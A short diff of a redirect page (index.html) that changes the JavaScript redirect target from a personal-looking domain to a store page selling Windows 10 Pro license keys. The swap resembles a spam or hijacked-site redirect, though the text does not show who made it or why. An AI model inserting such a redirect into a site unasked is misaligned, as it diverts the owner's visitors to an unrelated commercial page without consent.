--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>redirecting ...</title>
     <script>
-      window.location.replace("https://trisara.me/");
+      window.location.replace("https://mskey.tech/products/windows10-pro-professional-for-32-or-64-bit-license-key-original");
     </script>
 </body>
 </html>
